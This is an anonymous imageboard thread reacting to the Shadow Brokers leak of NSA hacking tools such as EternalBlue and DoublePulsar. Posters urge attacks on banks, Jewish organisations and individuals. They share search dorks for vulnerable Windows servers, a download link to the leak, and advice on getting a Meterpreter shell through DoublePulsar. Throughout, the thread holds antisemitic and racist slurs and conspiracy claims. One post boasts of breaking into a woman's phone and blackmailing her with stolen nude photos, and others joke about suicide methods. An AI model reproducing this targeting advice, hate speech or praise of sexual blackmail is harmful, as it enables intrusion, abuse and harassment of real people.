There are plenty of measures someone can take. Just because something is compromised doesn't mean you should just roll over and die. As long as you take suitable security measures for what you are doing, it is perfectly fine. For example someone working at a gas station and shitposting once in a while is never going to need anything more advanced than a simple VPN and basic opsec, since they aren't going to be the target of super complex viruses and will blend in the crowd perfectly.

the newer stuff does it better though, there's a reason they are trying to phase out old software and hardware and not just for moneys sake, they want people to get with the newer spy os and hardware so its quicker and easier to do

Happenings are THE most addictive drug

Looking forward to show this video to my grandchildren one day.

Shadilay

Support your local autist as he brings down the technostructure. Is this leak finally the one we've been waiting for or just more jokes still? Let's get vid related going. If the way really is open, then I expect major leaks and happenings fast.

Rothschild was a thorn in Hitlers side, I didnt make the meme, the point is it focuses on blackstone. Are you a shill, or merely stupid?

Also the opsec doesn't need to be very complicated either

Most of us are, that's why we depend so heavily on anons who aren't.

Is there some way this can be used to crash the central banks?
I don't just mean the Fed, I mean ALL the central banks, all over the world?

Wondering what would happen if billionaires all over the globe woke up one day and their money was all gone.
They'd still have their assets, but it would still be a huge hit.

There might have to be a complete reset, breaking their lock on the creation and distribution of wealth.

I'm just wondering if this could actually be used to benefit Whitekind.

Another approach (or layer if you still want privacy too) is practicing counterintelligence tactics to bombard their system with noise. Making the data they're collecting unreliable is nearly as good as not getting it at all.

WHEW LADS
I had fun with the last one, now this? What do we get next? 0-days into Nukes and shit?

do you mean we are anonymoose?
that's so cool!!
I can't wait to tell my friends
Oh, wait…

I'm sure their money is insured :^)

Rothschilds are the ones who loaned money to kings, and who took control of the European financial markets. I forget where it was broken down, but this movie is used as an example of how kikes infiltrate countries, but remain kikes, and leech off their host countries. One of them to London, another to Paris, another to Rome etc.. and they all set up lending wings, and they didnt need couriers, so they didnt risk being robbed etc. Rothschilds have always been one of the top kikes in the mix.

Blackstone is tied to Soros, the guy in pic related, and Rothschild. They engage in shady business transactions, an elite ancillary group as said in the other image. Anyways, no one really knows much about them. Id be interested to know some more, wouldnt you?

Anyone feel the shadow brokers are the ones who hacked 8ch just to show the potential?

Insurance companies are just another form of bank, they can have their data wiped, too.

Look at the sticky, its a honeypot.

just kill everything, we'll figure it out after

You could also passthrough your VM. Most motherboards have an onboard video card or you could install a shitty older one for Linux which is probably best anyway.

Hack in Arena 51

Will it work on battletoads?

Fucking up Soros would be quite a large feather in our cap.

Disable SMB and you're safe. It shouldn't be on anyways.

Which SMB? SMB1,2,3, all?

we already have leaked alien pictures

Damn, why are orthodox jews so tremendously ugly?

Lotta (1)'s up here trying to play it off as either nothing or a honeypot.

Thread theme

Any Holla Forums anons have a good recommendation for an exe disassembler and a decompiler that runs on *nix?

Where is Holla Forums?

Yes.

Time to kick this stand alone complex into overdrive.

They look like glorified skiddies.

They are.

The redpill is that the establishment itself is also run by Happening junkies. They cause them because they have the opportunity to get another fix by doing so.

They're the chosen ones, goy.

they look like albino filthy arabs

Fuck all the above except Slackware and BSD.
PCLinuxOS or Slackware (no systemD) if Linux, or FreeBSD/OpenBSD if you have no life / are an expert.

Meant for these guys.

Why do you think kikes are pushing multiculturalism and integration/cohabitation over real assimilation ? 50 years ago, the policy in Europe concerning immigration was, you either assimilate or you get out. now, i'm talking from a french point of view Polacks, Italians, Portos, etc; they all had to assimilate. And they wanted to, and a lot of them succeeded, you can't tell a Polish apart from an Italian apart from a French. But Jews, they never wanted to assimilate, they wanted to stay jewish. So they started to push the "integration" or "cohabitation" meme, instead of assimilation. And now nobody talks about assimilation in Europe anymore. And it allowed Arabs and other parasites to proliferate, because nobody is expecting foreigners to learn the language anymore. Or to act like the native population. And that is really destructive, because you can recover from a famine or an economic depression. But you can't recover from your demography changing.
it may be important to also note that barbaric acts like ritual slaughterings and circumcision were only made legal to accomodate the Jews, before they were any Arabs. Because we thought that it wouldn't have any impact, the Jews being so few. But now, we've got millions of young men whose house education is centered around gruesome slaughterings, from childhood. That's a big reason why Arabs are so fucked up and violent.

Dismissed.

it's a genetic disorder, and has not been rooted out, because they have lived as parasites in the other people's coutries for a long time

Damn wish I had any knowledge of this… hindsight 20/20 wishing would have been autistic at 14 instead of chasing pussy

Feels good man

BACK THE FUCK ON TOPIC. USE THIS SOFTWARE TO DESTROY ENEMIES, AND PROTECT YOURSELVES.

[*] Executing Plugin
[*] Connecting to target for exploitation.
[-] Error doing SMB setup 0xC0000022
[+] CORE terminated with status code 0xdf5d000d
[-] Error getting output back from Core; aborting…
[!] Plugin failed
[-] Error: Eternalblue Failed

On every target I've tried. Targets are Windows Small Business Server 2003.

Hack Twitter, Facebook, google

Good choice user

Can I be Scarlet Jokikeson

Question anons, anyone here already doing something?

I am downloading win xp for vm. Any reason the webm user used xp?

why is there a dick in this frame?

I'm trying to find a way to reverse engineer this shit but know nothing about windows binaries so I'm playing it by ear.

Any recommendations for

?

A business does not have time and money to update their entire system every year. XP is a lot more common then you think.

My FBI/NSA/DoD/DHS friend?
forgot to add, sage for double post

There is a dick they put into the childrens movie in the theater scene when he works as a projectionist.

Jesus fucking christ

fucking beautiful.

I recommend these two links:
https:[email protected]/* *//the-nsa-compromised-swift-network-50ec3000b195
https:[email protected]/* */[email protected]/* */d-windows-7b7782270e70

huh. I never noticed those when I originally watched the movie. Adds some new and interesting implications. I'll stop shitting up the thread with dicks now. Should have spoilered b4 :(

Pics related are potential valuable targets. It'd be great if someone used these tools to dig up info on probable pedo rings. It could even lead to the rescue of more slave children.

Small Business 2003 Dork
google.com/search?hl=en&q=intitle:"Welcome to Windows Small Business Server 2003"&num=100

IIS 6.0 Dork
google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q="Microsoft-IIS/6.0" intitle:index.of&btnG=Search

I can't get any of this shit to work properly so owell

0/61
read https:[email protected]/* */[email protected]/* */d-windows-7b7782270e70
And ask yourself, why the NSA didn't warn Microshit of thiese vulns.

medium.com[email protected]/* */[email protected]/* */d-windows-7b7782270e70

holy shit Holla Forums is dumb…

https:// medium.com/ @ networksecurity/latest-shadow-brokers-dump-owning-swift-alliance-access-cisco-and-windows-7b7782270e70

Inbreeding

It still works if you're using javascript famalam.

TOPPEST OF FUCKING KEKS
Babbies first 0-day?

Shadowbrokers tried to warn (((the NSA))), but they didn't listen.

OH FUCK IT'S EVEN BETTER THAN THAT.

lalalala
translation: We weren't hacked, we cooperated with the NSA by giving them your data after they showed us that they're able to get it anyways.

THIS

Bruh. Linux Mint is what all the cool kids who dig into binaries while unironically listening to nerdcore use.

Not a tech guy but I was expecting more stuff on the infrastructure level (router, switches, modems, proxies).

No Mark Pincus?
Investigate his links to the Clinton Foundation and David Brock, he even talked at a Media Matters aka Shareblue conference after the election on how to influence the internet. Now that he has shut down his shitty pedo social etwork called tribe.net and deleted all the evidence we must push for his arrest.

If things continue like this we will get them.

user… exploits to their services are provided… who uses SWIFT?

Careful what you meme user.

Hummm

This honeypot will get you Gitmo-ed. Enjoy your ass-rape by the Taliban idiots!

youtube.com/watch?v=dha0cxQVTj4

I will personally reverse engineer every exploit in this dump.

Always quality posting FBI, how big are your watch lists now? Are you afraid of the people you protect yet?

You know what to do

Why not use this to go after podesta and pizzagate?

wow dude you're real scary

Every bank in the world uses SWIFT and I don't believe them one word. Either they got pwned or they cooperated and installed the exploits themselves, basically the same thing. The NSA can see any international wire transfer in the world, one more reason to use Bitcoin.

After so many years of irresponsible memes, it can't not happen anymore. The happening has become a self-fulfilling memetic prophecy. It's still taking its time though, fuck

This.

This is why BTC exchange is much more secure.

Implying Bitcoin is any more anonymous. There's a good reason (((they))) are switching to the blockchain to replace swift and it sure ain't because of its security.

If you know what you're doing, Bitcoin can be pretty anonymous. Also there are now fully anonymous blockchain coins, Monero, Dash and Zcash for example.
news.bitcoin.com/meet-top-3-coins-cryptocurrency-anonymity-race/

Also all the Cryptonote coins are fully anonymous.

Kek

Is this why my laptop has been freezing up all week?

*couch*

Not likely, this was leaked by your elders in order to shut down the internet.

yes. i'm watching you, brian

>yadi.sk/d/NJqzpqo_3GxZA4
Holy shit they're literally /ourguys/, I knew that we had anons in high places but I had no idea it was this high.

These screenshots are showing an exploit for Samba, file sharing software. Somehow they are injecting samba on the machine, opening the samba port and then doing whatever with the file system.

www.samba.org/samba/what_is_samba.html

Look at Samba's tagline.

If our janitors or mods don't use this to dox and destroy shills, then they've failed at their duties and need to be replaced.

I’d just like to interject for a moment. What you’re refering to as Windows, is in fact, NSA/Windows, or as I’ve recently taken to calling it, NSA plus Windows. Windows is not an operating system unto itself, but rather another locked down component of a fully functioning NSA system made useful by the NSA corelibs, shell utilities and vital system components comprising a full OS as defined by the government.

Many computer users run a modified version of the NSA system every day, without realizing it. Through a peculiar turn of events, the version of NSA which is widely used today is often called “Windows”, and many of its users are not aware that it is basically the NSA system, developed by the NSA.

There really is a Windows, and these people are using it, but it is just a part of the system they use. Windows is the kernel: the program in the system that allocates the machine’s resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Windows is normally used in combination with the NSA operating system: the whole system is basically NSA with Windows added, or NSA/Windows. All the so-called “Windows” versions are really versions of NSA/Windows.

It will be used to put you in a Fema camp for RE-EDUCATION.

You took the red-pill so hard everyday that you created a thought crime in the eldars eyes. So hard that you are now deemed the edge crusher against the system and are a threat to the Technocracy.

You may want to start disappearing like a ninja right now.

YOUR FUTURE IS SHADOWRUN
YOUR FUTURE IS SHADOWRUN
YOUR FUTURE IS SHADOWRUN
YOUR FUTURE IS SHADOWRUN

I dont care, it'll be interesting

Man, I fucking love when it's happening, I have that sweet feeling in the guts and my heart beats faster.
H A C K T H E P L A N E T

This guy is full of shit.

Captcha for this post was pic related. PRAISE KEK!

So is this what's supposed to get everyone on the chans arrested? Saw a post a while back warning to stay off the chans because there will be many arrests.

That was just a scare tactics shills were using to try and take over the boards.

I hereby disavow all past and future posts that may be linked to my private identity.

They were all combinations of lies, jokes, trolling and sarcasm.

At no point did I mean anything posted seriously, unless it is something that I am supposed to think/say/believe/shill.

copy and paste to legally protect yourself under international law

top lel.

SMB is a crucial Microsoft server protocol, Samba only emulates it, so you can have e.g. Active Directory servers running on Linux. It's not a "file sharing software". Read en.wikipedia.org/wiki/Server_Message_Block
Don't spread disinfo.

This latest release allows any company using Active Directory to be pwned until a patch is rolled out. The time of the release couldn't be better, expect lots of pwned companies after Easter, as AD is used pretty much everywhere.
en.wikipedia.org/wiki/Active_Directory

Top kek. Nice little meme you cooked up there. Don't think it'll work though.

Anyone who believes what people say on anonymous imageboards is a retard tbqhfam.
Literally all we do here is LARP. No, I'm not Chad, I'm a 300lb NEET with no gf and no life just miserably living out my life until I work up the courage to suck start a rifle.

You mean like some bitch's private closet server?

sunshine

hue

I'm not a shill, you faggot. (That other guy definitely is though)

stfu fag, samba is software and smb/cifs is the protocol. stop spreading disinfo you little bitch

Damnit sam, I told you official business only for a few weeks. Stop jerkng off to these faggots and get back to work seeding discord and black cocks on their puters.

I've tried searching but can't find that book, any tips?

Get /g/ on this

Waiting for someone to plaster all over their pages in comic sans:
OH HAI GUYZ!

>>>Holla Forums

Use the tools to search the NSA. They are bound to have a copy.

reminder that Holla Forums and overchan /g/ is your personal tech support and is always willing to help. if you're unable to run any 1337 sploitz on your windows installation, don't be afraid to ask for an hand holding

t..thanks user-kun

pic related.

Oh shit, we're coming clean about our real identities? I should tell you guys I'm not really an FBI shill then, I'm actually a 6 year old autistic little girl. Sorry about lying guys~

You're not fooling anyone you godless NSA Nigger.

The exploits are SMB exploits aimed at Windows, they have nothing to do with Samba. You'd know that if you'd have read anything ITT. Are you a nigger by chance?

'Tis but a funpost, user. Rule 29.

A/S no L. Like you aren't even trying Sally Rand of 1023 S. Grand, Ca.

Don't sleep tonight.

I wonder if any niggers will be stupid enough to attempt changing their criminal histories with these tools.

you miss 100% of the shoots you don't take

Pro-tip: Shotguns are easier to start. The straws are bigger.

I'm getting a massive dose of AOHell nostalgia.

thank you! Python 2.6 was the issue for me. I thought 2.7.13 was no different. stupid how it can only be run on windows but it is better than nothing

you think too highly of the elites

they're just normalfags who found themselves in central circles

they're in above their heads

/ourguys/ will rule the world

Use Antergos if you're a noob and want to use Arch.

can somebody give me quick rundown on how serious that could be? I mean could a normies feels effects of it? Shutting down ATMs maybe?

Anything running a software that has been exploited by SB is hackable by the script kiddiest of them all.

Every company that has a Windows server that can be reached over the internet can and will bepwned.

Anything with systemd is compromised.

Stop it

As there are physical backups of all banking data it won't be the end of the world but it could be a time-consuming mess to fix. I would be less worried about the ATMs and more about balances they can access to even give you your money.

Pull some cash out and keep it safe, continue to use your bank as normal otherwise until something happens.

kind of true tbh fam i might actually pull my modest savings out in cash for a few weeks just in case

You guys are ok. Stay away from xbox live tomorrow.

cool

Tronscript is useful for leaning out the known windows spyware.

so hypothetically, considering these exploits range from 2003 up to today, anyone with a windows OS can be hacked and there's nothing to be done about it software side until the exploits are patched? the only way for anyone to stonewall hackers is to essentially yank the ethernet?

haha wow

wonder if this can this evade my 4chan ban

Yes.

Technically they can hack you through a speaker but yeah if you're connected so are they.

Holla Forums is too busy arguing about Linux distros and shit

we need /baph/

Evade? You could shut out all their mods and owners until some faggot pulls the server physically.

Come to tech with your problems. We claim to love to help but end up jerking each other off about USB voltages until you leave and just buy a new computer .

(checked)

But what if you think outside of the 'thinking outside the box' box?

my sides, thanks for that user.

Holla Forums has a strict policy about helping windows users.

it kinda depends on which ports are open through your router.

Only one Windows 7 sploit in this list. No wonder they're so desperate to push people to Win10.

kek

Win7 is what I'm using. My brother kept trying to push me to move to 10 for a while but I kept saying no. Too many red flags.

i doubt closing a few ports would properly protect from things that sound this bad

My nipples are so hard right now they could cut glass.

I'm creating a mega mirror of these leaks… uploading now… I'll post the mirror soon!

it's the other way 'round user, you only open the very few necessary ones to the world and close all the rest.

The funny thing is that the serious engineers I know–myself included–use Windows or Mac because it gets boring to endlessly deal with Linux "desktop" bullshit. Holla Forums generally strikes me as a bunch of mouthbreathing neckbeards who don't actually do any serious computing work except developing for Linux itself.

They'll pry Win7 from my cold dead hands. Fuck Win8, fuck Win10, fuck Mac OS, and double-fuck Linux desktop'. The funny thing is that I do all my actual work on a headless Linux box a few thousand miles away, but I'm using Putty as my terminal.

Also, unless they own your router or another machine on your inet, NAT is an adequate protection against most of these attacks. If they probe a specific software package, they can't do shit unless it's listening on a publicly accessible port. Of course, the second a machine inside your net is compromised, that usually you're fucked unless you have internal security to specifically protect against that sort of thing.

You can lock down windows 10, at least temporarily. The shitty part is that if you don't do it right, MS can change your settings to open it back up again. Best way to protect all devices on your network is to have a well configured router in between your modem and your internal network.

Please sir give Windows 10 another try, we implemented tabs in the file browser, very new and experimental, lucky technology.

Next release will contain the Linux exploits. Solaris was thought to be safe but look at the last SB release.

DESIGNATED PUTER

Also win10 users can make use of this software to easily prevent updates and all kinds of other windows fuckery.

www.oo-software.com/en/shutup10

This entire thing reeks of psyop, up to and including this sticky. Now that 8ch is entirely compromised we have to ask ourselves - why is this being pushed? Why do they want us to know and think about this?

A Psyop wouldn't bring 95% of the companies in great danger.

Wanna bet?

SHADOW BROKERS NSA LEAK ARCHIVES!

mega.nz/#F!KsgWRJhY!9vS-X7qU-ey4QNjkAziJMw

So far leaked by the Shadow Brokers (in order):

1) nsa-malware-scripts.zip (this was the free sample they handed out last year)
2) EQGRP-master.zip (this was their failed bitcoin auction / decrypted last week)
3) EQGRP_Lost_in_Translation-master.zip (the most recent leak!)

It's real, in the news, and tech companies are freaking the fuck out over it. 5 minutes of googling would show you it's real, but no you just want to shit up threads, have your hand held, and sniff glue.

If this is a Psyop their goal must be to get rid of the NSA.

The kikes (i.e., lloyds) aren't going to pay claims if they can prove that Microsoft knew about these exploits and didn't fix them. This could bring on some serious kike on kike violence.

Oh, I believe it's totally true, lots of psyops are totally true, just a carefully curated collection of true facts. What I don't believe is this is an accident or some kind of leak - I think it's being pushed. So the question isn't "What can we do with these tools" though obviously there's a lot of weird and interesting stuff in there - the real question is, "Who wanted to give us this shit and why?" Is it the Russians? Is it the US Deep State in preparation for something?

If you're on Bangblows your AV probably ate it.

I have eternalblue and doublepulsar installed on a test machine on my network. How do I copy files to and from it now that it is backdoored? Everyone only discusses installing the backdoor but nothing afterwards

Also, seems it was already patched from before:
>thehackernews.com/2017/04/window-zero-day-patch.html

It's real, and it's also been already patched by microsoft over a month ago and all articles are updating and saying that literally all you have to do is update your windows. I know Holla Forums likes to jump at every single thing that even vaguely seem like a happening but come the fuck on, this one is fucking nothing.

this

Now we know why the Russians built an alternative to the SWIFT network. And why the Deep State wants us at war with them so very badly.

I was trying to show an easy alternative without systemd (PCLinuxOS) for the plebs. Should've mentioned Gentoo along with Slack, but neither are for plebs.

Ok now I know these are fake.

What if the Deep State wants to coup ebul warmonger Trump and put into office good goy constitutionalist nationalist?

Someone pls reply

And you think that's the truth rather than MS calling these outlets and running damage control? How would they have patched these exploits if they didn't know about them? The only way they could have been warned was if the NSA told them which MS explicitly stated they were not warned about. This doesn't add up.

There are some problems that money can't solve and Windows is one of them.

Does anything lately?

Gov probably knew what they had and quietly started getting tech companies on board fixing shit. They are months ahead of everyone else because greedy fucks sat on it hoping to get paid.

if i was good at articulating all that metaphorical type stuff i would say some jordan peterson esque thing about saving the princess who's locked in the tower or something like that

Of course this is a psyop, just not against 'us'. This is spy vs spy shit. The rumors about a war in heaven pitting the baby-raping followers of moloch vs those disgusted by them are turning out to be true.

It's a good time to be alive.

Personally, I'm more of a CentOS guy

Is it all really delineated so nicely? Is this a clear case of good guys v. bad guys or are we being led into another maze within a maze within a maze? Hillary ain't in jail yet. The Tape hasn't been released yet so the whole world can understand what is happening and why.

americanforkdentists.com/oral-hygiene-looks-like/

Poland: ~4 teeth decayed, missing, or filled in the average 12-year-old
Hungary: ~3.5 teeth
Czech Republic: ~2.5 teeth
South Korea: ~2 teeth

Netherlands: ~1 tooth
Denmark: ~0.75 teeth
Germany: ~0.75 teeth
Britain: ~0.75 teeth

>Surprised? You read that right: despite the constant jokes about their teeth, the British are among the best in the world when it comes to oral hygiene, topping the rankings while the United States''' ranked in the middle of the pack at 10th overall (~1.25 teeth).

Of course not, it's never that simple. Some of the 'bad' guys got so disgusted and freaked out by the pedo snuff films they finally had to do something about it. OTOH it's not like the chans are full of well-meaning anons who would never hurt anyone. But we can all agree raping and killing children is wrong.

Sadly it is based on crooked standards.

Could be a great time for a major war with North Korea, that would be pretty distracting, wouldn't you say?

Same old tricks (((they))) always use. Wag The Dog turned out to be a documentary.

Could you imagine a world where they left one or two launch controls (((accidentally))) connected to the outside? Oh the shitshow that would follow.

Huh? Fuck these clowns, THINK BIG!

Better yet, any nork controls connected? Hope the gov plugged those connections before an user gets the party started early.

How do use this to steal the current build of Bannerloardm.

t. Holla Forums

The ADL would be huge if you got ahold of their dealings and files on folks. Any removal of matzo is huge.

jej that's actually a sort of funny question… I've been wondering how long it's gonna take to crack Deneuvo re: Automata…

If anyone got big using compromised Windows servers or PCs, the Fourth Reich will come a lot sooner than anticipated.

By accessing the faglord script.

learn how to smb.
Don't know much about it (yet), but I guess you should download samba first.

Deneuvo is already cracked.

Question anons:

Has anyone identified what the backdoors actually are and how to remove them?

Can they be removed? Or is it much more complicated than that?

Why are these exploits even possible. Is Microsoft that lame that they are not able notice holes in their own operating systems? Or have they colluded with NSA and know about these holes?

Think globally, act locally. Find the neighborhoods with high concentrations of 1%ers (oy vey!) and go after their home networks. Once that is compromised use their VPN back to the Goldman Sachs mothership to get inside. Then destroy them.

Every one of the Unixes as well as Linux has a much better actual OS implementation than Windows, even HP-UX. The only thing I like about Windows is that the file-locking mechanism is more retard-proof, and the NT kernel doesn't fuck around with symlinks, which often wind up pointing to deleted files.

The registry is the most retarded thing about Windows, though. All it's good for is duping "1337 [email protected]/* */$" into downloading "registry cleanup" tools that are effectively malware and usually corrupt other installed programs, all in the name of getting 240fps on Minecraft. On top of that, having a registry is a good way to keep programs from being fully uninstalled.

If you want to manually uninstall something on a Unix, all you have to do is "which ", scrub the directory from PATH, and "rm -r" it.

They are complicit. They only kvetch when the public becomes aware.

LARPing aside… does anyone here have any proof of them having access to another machine?
Not your own PC, not a virtual machine, but a completely remote IP that you probed?

I'll try it later with a friends PC.

Yes I have access to your machine. Nice porn collection.

I tried it works, installed backdoor , then i removed it. It works

okay, I have tried connecting to it over smb but I don't know what username and password I need. The windows account has no password

>If you want to manually uninstall something on a Unix, all you have to do is "which ", scrub the directory from PATH, and "rm -r" it.
Not strictly true. Most programs of substantial size are going to alter /etc/ or /opt/ files in some non-trivially reversible way. That said, there is no registry bullshit and in theory some kind of grep or search can be run to figure out exactly which text file is causing the problem.

At the end of the day, you give the program access, it could have done anything.

As I said, I don't know about it yet.
Will look into it later today or tomorrow.

Hit backspace 6million times

Think bigger, Tay is fine but my priority would in case I rooted Microsoft servers would be to look after the full sources for every Windows version.

In case one of you guys manage to do it, after you get Tay and Windows sources please do a lookup for OG Xbox sources and hardware / bios documentation if you have time, so we can have working Xbox emulators some day

You also saw when that reddit faggot gutted an Xbox dev kit to turn into a sub par gaming rig didn't you?

Sage for off topic

aaaah, an xbox emulator. sweet sweet xbox.

Going to wipe my Kubuntu install for PClinuxOS, I lack the skills and patience for Gentoo or Slackware.

Doesn't work on my machine(tm)

I got Eternalblue running remotely, but I can't get a shell via Doublepulsar yet.

Everything's been patched, all you can infiltrate now are Chinese WoW gold farms in Beijing still running XP

Would've been quite the happening though

How are they doing this?

Kushner and blackmail.

Why is everyone freaking out, NSA tipped Microsoft off before the leaks likely when the realized they were compromised

These are dead tools now, that's why /baph/ isn't flipping out either

It's all part of the stage-play for the kike end times cult trying to bring about their filthy kike messiah.

redefininggod.com/

Yes, I took all your animoo user. Sorry.

A globalist wouldn't ditch the TPP like Trump did.

Jesus Christ everyone that disagrees with me is a shill

I doubt this guy saw the newest dump though

Holla Forums here
use this! Don't be an autist like I am, who used a previous vault leak to tailor an iOS nuke with which I was finally able to get into the iPhone of my qt 22y old neighbor, exfil some nude selfies from her phone and use it to blackmail her into the best sex I've ever had in my whole life had sex only twice before. She is still in the process of becoming my slave waifu.

So please, use this shit to make something out of it. Don't be a BETA like me who has to use tech wizardry to get sex.

Video related. I'm ready.

They said BECOMING! That's my point. How are they moulding him into one.

For anyone who got this working on a VM or whatever: is the name of the injected dll random? Does it always target lsass? Otherwise is there a way to detect that you've been compromised by EternalBlue?
Thanks bruvs

I LOVE FREEDOM

Jewish magick, deep state, JKF moments or just politically moving to the center for mass appeal.

So are we patched or still a go go?

Idiocy, what matters is precision, not infantile shit.
Inner child is for exploring not for thinking that the world does the same.
Silicion valley thinks that "if you think it is too early it is already too late." I think if you think like that it is already too late for those fat lesbians, and that is what they are in essence.

Yes, it was extremely painful for me.

I think after we use doublepulsar, we have to do something like "use smblist". but the shares don't work. neither do the credentials.

even after patch release there will be a fucklot of vulnerable systems, so I'd not worry

You have an elite that is a bunch of fat radioactive lesbians that have certain "visions" and some old school boys that will rape the fat lesbians at will.
And you have a bunch of uneducated dumb americans that are one trick ponies that get fed the idea that you have to be a sjw lesbian to have success. Oyy.
Pretty cool shit if you ask me.

i still dont understand how onion is a reliable news source but it is

I dont even know what onion is.

Transparent.

Thanks for confirming your age

You forgot a dot at the end of your sentence, i assume that would either indicate that you are of short attention span or trying to emulate that.

what were you saying again?

Hitler trip check

That you write like a bitch. But thanks for verifiying that to me.

It is called a period. Have a dot anyway.

I don't understand, Holla Forums. Should I turn on my windows updates or not? It seems like we get jewed either way.

4 minutes and that's the best you could come up with? c'mon now son

Has anyone identified what the backdoors actually are and how to remove them yet?

Can they be removed? Or is it much more complicated than that?

Ate my image.

I know lacking periods must be pretty hard for a bitch.

I would say that to you in 9 months.

Good. The more mirrors we have the better.

All I can say:
1. Backdoor from the ETERNALBLUE isn't persistent, it requires further action.
2. Shit's sneaky, it doesn't open any additional ports and, apparently, is running in ring-0.

git off my board street shitter, whitey allowed only

TITS OR GTFO

A mirror can be found here:

All three releases from Shadow Brokers are included within the mega.nz link.

Your fleshy dirty pillows for my extensive knowledge.

for anyone wondering what to do after popping the eternalblue sploit on a target, use doublepulsar and metasploit to stage a meterpreter shell with an APC dll injection attack.

>>>/reddit/
>>>/gaschamber/

Try to stay focused, user. This is about pwning every Windows server on Wall Street.

do you know how to use the smb service to copy and paste files with a gui file manager?

Are you feeling a connetion to the tripple 21, i subtract 3 minus 2 minius 1 and i get zero periods?

Why is this gay thread stickied and why is Holla Forums so fucking retarded when it comes to tech

I wish I was cool enough to WON THE GOLD MEDAL

If i would be wallstreet, i would collect all that shit to make more accurate predictions of my little sucking tool. In a way society sucks wallstreets dick. But wallstreet thinks shortterm, and relies on the fat tech lesbians that provide information like a slut provides pussy.

not all people apply security patches the moment they come out.

Not if youre using your government mandated windows 10 distrobution goy. Youll get your auto updates and enjoy them or be in trouble. Honestly, how does this entire happening NOT look like a bad attempt at microshill pushing for windows 10 upgrades. Home owners on older systems (read windows 7 as anyone on xp still deserves what they get) are perfectly fine. And any businesses have already pushed the patches. This thread is over

what the fuck are you talking about

If it was you user- thanks for giving my machine back-

I know a girl that studies electronic engineering, and the way she acts is what i described.

The boobanimal also drinks protein shakes and thinks that if she drops weight while being skinny that makes her more "perfect" and the only thing it does it makes her ass and tits shrink. And the her skin speaks of stress and usually people that are under a lot of stress believe in that retarded concepts.
Just like that guy that posted that retarded picture of the feels guy.

To be fair while these hacks could have a chilling effect on speech they could have had you rooted years ago. Compromise your distro's update server and you are done and you just know microsoft works with them. Or do they? The fact that these tools we even developed indicates to me that they did not have the means to access computers before this, otherwise why look for vulnerabilities?

There's a lot of bots here FYI

You mean the the same retarded shit your intellectual thought leaders spew to make you comfortable while they take all your bases, i guess if i dont conform that must make me a bot. But if you really think about it, you are the bots that allow others to take away more and more, ever so slightly chipping on what you really are because someone inserted his dick inside you. And you will only notice that if you look at that from what you were and what you are now. And people like me always stay the same. That is the riddance you will have at the end of this journey.

Pnac has been talking about a cyber 991

last time they said new pearl harbor ,well

It always makes me wonder if I only notice the shitty ones.
The implication being that the better ones are fooling me.

Also thanks for the thread and explanation OP,
would have been lost in this otherwise.

that was me you drooling mongoloid, learn to use IDs

i do EE because I have a passion for it, i was just bemoaning the lack of perceived glamour in the field compared to 1337 h4x0r5

please go back to /r9k/, that's a better place for you to autismally bitch about the /fit/ girl that rejected you

They're server-side, too. What does that tell you?

Didnt reject me, in fact she is masturbating to me if i go for my intuition and the way she behaves. And i m really precise in estimating other people.
Maybe you cannot think that some men do not want skinny rail thin bitches with no tits and ass.

No, stop being a pussy.

why not do both?

I have no idea, it's like Holla Forums

Let me guess, though–you make six or seven figures in a cushy STEM job, you're a Navy SEAL, and you have women all over you every day, right?

I got into advanced data recovery, and I'm dedicating my spare time to learning that now. If the dude that's helping me get into it is right, I've got a few hundred hours of study and several thousand dollars of equipment to buy before I hit babby-tier.

It's a REEEEEvolution

Thread theme

This cunt smelled her fingers while being on the toilet for 15mins when she came back, that fits in when she was standing up to go to the toilet where i thought what she was doing and was consistant when she came back.

It can also help if you have a dominant alpha women having a huge interest in you.
I think that nerds need some tits before falling prey to fat lesbians working for silicon valley or wallstreet, unless you make a lot of money. But if i would be wallstreet i would cultivate a cult of lesbians to keep you at some sup par mid tier shit, because that would work.

So what do you do after you successfully install the backdoor using Eternalblue? How can you own the computer after that.

Literally anything, search "meterpreter".

i just laughed

I don't understand–not that I'm having trouble processing the ideas you're putting out, but your sentence structure and word choice literally makes no sense. Please go back to whatever designated shitting imageboard they have in your country and ask them for tips on how to banter in English without looking autistic and/or retarded.

1st thing you ever do on a hacked machine is check your email.

install more shit, steal files, plant cp, %activityname% etc

Reminds me of the hardcoded cisco password about a year ago. Christ

Why are you talking to bots? It's the same thing that happened around election time.

Trolling and other shit is reverse engineerable, same goes for intelligence because it follows a certain pattern.
But i think since this board is personal, if you violate certain ethics wether you are a troll or intel, you will get fucked in the ass. That is how i think it should be. Either anonymous or not.
Either skill or pathetic hacking shit, either this or it none of that.

Are you having trouble comprehending very simple sentences?
I assume if what you wrote is genuine you give me a good estimation that you are a beta, it is a little bit to factual, like something you are forced into and you also copy some of what i wrote which means i m the dominant character here. and/or is what you copied which indicates some insecurities which means a certain distance in context of what i wrote in the first place.
In a way speech and its written form are like healthy pair of tits, they will always stick out even if you wear a thick dress.

I mean how do you actually go about doing any of that after running the Eternalblue exploit.

Ive successfully installed the Backdoor on multiple machines but idk how to actually use it lol

pop doublepulsar and stage a meterpreter dll payload with an APC DLL injection attack.

Use MSF for meterpeter, and doublepulsar shouldnt be too hard, refer to

I don't think it's a bot, just a non-white. But who knows?

What if I told you that I just got a shell on a North Korean server?

can you trigger nukes from it?

if not, its irrelevant.

My sides just blasted off. Instead of the nork server I pwned my own PC.
*full_retard.jpg*

Could be mistaken, reminds me of the chink chonk that was shitting up Holla Forums at a point. Pretty sure it's the same ricenigger.

OpenBSD when?

Shadow CIAniggers need to release the iPhone exploits, that's the only way normalfags are going to give a fuck about this. When the furries start getting their iPhones bricked they will start to bleat.

Holy shit, I almost forgot that most people don't even use a PC anymore. Sad.

Hmm….. "team.4chan.org" happens to be running IIS….

interesting

The only way the normies will give a fuck about this when it is cool to give a fuck about this.

run explodingcan against it and see what happens i guess

Buy gold

Can you explain how to use metasploit to do this? I'm not familiar with the framework at all.

Same. I figured out how to inject a DLL using doublepulsar easy but don't really know how to create a DLL payload, been trying to read up on google a bit but a lot of it seems overcomplicated and beyond me :x

checked
o sorry i meant

I hereby disavow all past and future posts that may be linked to my private identity.
They were all combinations of lies, jokes, trolling and sarcasm.
At no point did I mean anything posted seriously, unless it is something that I am supposed to think/say/believe/shill.

lmgtfy.com/?q=metasploit meterpreter dll payload

Sweet, I'm going to try and use this the only question is how will I be getting the IP of the targets. Do emails contain any headers or something with the host IP?

Already tried that, none of the results really help in terms of what we're trying to do here, still reading up on some though.
